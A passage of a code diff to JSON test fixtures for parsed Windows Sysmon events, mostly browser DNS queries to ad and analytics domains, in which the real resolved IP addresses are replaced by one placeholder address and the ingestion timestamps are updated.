@@ -1535,13 +1528,13 @@ "cms.analytics.yahoo.com" ], "ip": [ - "74.6.137.78" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313758031Z", + "ingested": "2021-12-09T13:49:44.739151900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1609,12 +1602,12 @@ "type": "CNAME" }, { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { 
@@ -1631,13 +1624,13 @@ "cvision.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313759226Z", + "ingested": "2021-12-09T13:49:44.739157800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1705,17 +1698,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -1732,14 +1725,13 @@ "g.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313760383Z", + "ingested": "2021-12-09T13:49:44.739164Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1799,12 +1791,12 @@ }, "answers": [ { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { 
@@ -1819,13 +1811,13 @@ "lg3.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313761551Z", + "ingested": "2021-12-09T13:49:44.739168400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1889,22 +1881,22 @@ "type": "CNAME" }, { - "data": "54.88.96.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.100.168", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.209.58.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.88.96.255", - "34.233.100.168", - "54.209.58.223" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -1920,15 +1912,13 @@ "service.sp.advertising.com" ], "ip": [ - "54.88.96.255", - "34.233.100.168", - "54.209.58.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313762836Z", + "ingested": "2021-12-09T13:49:44.739172600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -1988,7 +1978,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313764073Z", + "ingested": "2021-12-09T13:49:44.739177500Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:44.723248500Z'/\u003e\u003cEventRecordID\u003e2686\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:44.714\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -2057,12 +2047,12 @@ "type": "CNAME" }, { - "data": "184.25.176.117", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "184.25.176.117" + "89.160.20.156" ] }, "network": { 
@@ -2079,13 +2069,13 @@ "sb.scorecardresearch.com" ], "ip": [ - "184.25.176.117" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313765262Z", + "ingested": "2021-12-09T13:49:44.739183100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2153,12 +2143,12 @@ "type": "CNAME" }, { - "data": "40.114.54.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.114.54.223" + "89.160.20.156" ] }, "network": { 
@@ -2175,13 +2165,13 @@ "otf.msn.com" ], "ip": [ - "40.114.54.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313766453Z", + "ingested": "2021-12-09T13:49:44.739187100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
